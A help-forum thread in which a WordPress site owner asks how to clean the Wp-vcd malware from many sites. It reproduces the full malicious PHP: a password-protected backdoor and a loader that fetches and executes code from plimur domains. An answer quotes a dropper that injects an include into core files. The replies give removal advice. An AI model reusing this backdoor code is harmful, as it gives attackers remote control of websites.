L
L
Leonid2017-12-01 20:38:14
CMS
Leonid, 2017-12-01 20:38:14

WordPress virus Wp-vcd Malware - how and with what to treat many sites on a local and remote server?

Today I found an unfamiliar php code at the very beginning of the theme's functions.php file on the local copy of the client's site in OpenServer.
After analyzing the code (see its listing below), it becomes clear what malicious files the virus creates and uses:

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
@file_put_contents('wp-tmp.php', $tmpcontent);

content is taken from here: @file_get_contents(" www.plimur.me/code.php ")
It turned out to be: Wp-vcd Malware (description: https://medium.com/@cirku17/wp-vcd-malware-analysi... ).
It has already infected all sites in the Open Server's domains folder.
Now I'm thinking about what treatment plan to apply for local sites on Open Server, as well as hosted sites - which 99% are probably infected and will also have to be treated.
In manual mode, search for a file and delete the code?
Use Wordfence Security?
How would you solve such a problem?
Dr.Web and Casper scanner naturally do not react to this infection!
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6a4e5fe9a1201bb912b919582d2b4d6a'))
  {
$div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
      {

        




        case 'change_domain';
          if (isset($_REQUEST['newdomain']))
            {
              
              if (!empty($_REQUEST['newdomain']))
                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                 $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;

                case 'change_code';
          if (isset($_REQUEST['newcode']))
            {
              
              if (!empty($_REQUEST['newcode']))
                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                 $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;
        
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
      }
      
    die("");
  }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='4ac5f5262e6795cb9216f0b8db3a8f0b';
        if (($tmpcontent = @file_get_contents("http://www.plimur.net/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimur.net/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.plimur.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.plimur.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimur.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>

Answer the question

In order to leave comments, you need to log in

5 answer(s)
A
Alex-1917, 2017-12-02
@alex-1917

Search for a backup without rubbish, after what time to check whether the backup turned out to be correct, if not, then look for an even earlier one.
In general, judging by the statistics of this particular rubbish, most likely (I do not approve) the rubbish climbed out of stolen plug-ins.
How do millions of other sites on WP not get infected, the question did not arise? And then right now you will inflate an elephant out of a fly by throwing another stone into the WP garden.

K
karp900, 2018-01-21
@karp900

Everything is much simpler, the treatment procedure is simple, I myself fell for this rubbish. here is an example of a file that was in the plugin during the installation of class.plugin-modules.php
If you look closely at all the code, it becomes clear what needs to be done, it is simply not needed at all here is a small piece from this file if ( ($file = file_get_contents( $path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname( __FILE__) .\'/wp-vcd.php\'); ?>' . $file;
file_put_contents($path . '/wp-includes/post.
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents(' www.lanons.com/admin.txt '));
}
}
It is one file that, when installing a third-party plugin or template, creates the entire container with viruses, before installing it is worth looking into what you are installing

B
Boris Shpakovsky, 2018-03-11
@kotboris

I also stumbled across this crap the other day. The entire infection is located in the class.plugin-modules.php file, it was present in the plugin in 2 folders. You need to remove them and the plugin or theme is healthy. But if he has already managed to mess things up, then you first need to get into the functions.php of the current theme and find the code there that you described in the question. Then in the WP core folder in wp-includes find 2 files wp-temp.php and wp-vcd.php, and delete them to hell) everything, your wp is clean. I recommend checking all plugins and themes in virustotal before installing, but in general try not to use pirated plugins and themes. It is better to pay one and a half thousand once than to suffer from viruses later. I'm buying licenses, but then I suddenly decided to check the null plugin, before buying it, and I really regretted it. My sites have left the top because of this rubbish and it is not known when they will return now.

G
gadzhkamil, 2018-05-01
@gadzhkamil

Can't use search? On the very first link, a detailed description of the removal of this muck: https://chtokak.com/post/chto-za-virus-wp-vcd-i-ka...
In general, do not install zero plugins and themes - this bug only climbs from there . Well, or at least clean before installation - remove files with the wp-vcd keyword from the archive (usually it's class.plugin-modules.php as written above)

@
@prografika, 2019-05-01
_

Oh yes, this server rubbish infects and many hosting providers prove that it’s not us, it’s not a problem to clean the functions.php file and update the engine, but if you don’t fix everything on the server, it’s useless. I sometimes just suggest changing the server, since I don’t deal with servers myself and often even ordinary shared shares are exposed, where there is no way to look for an infection.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question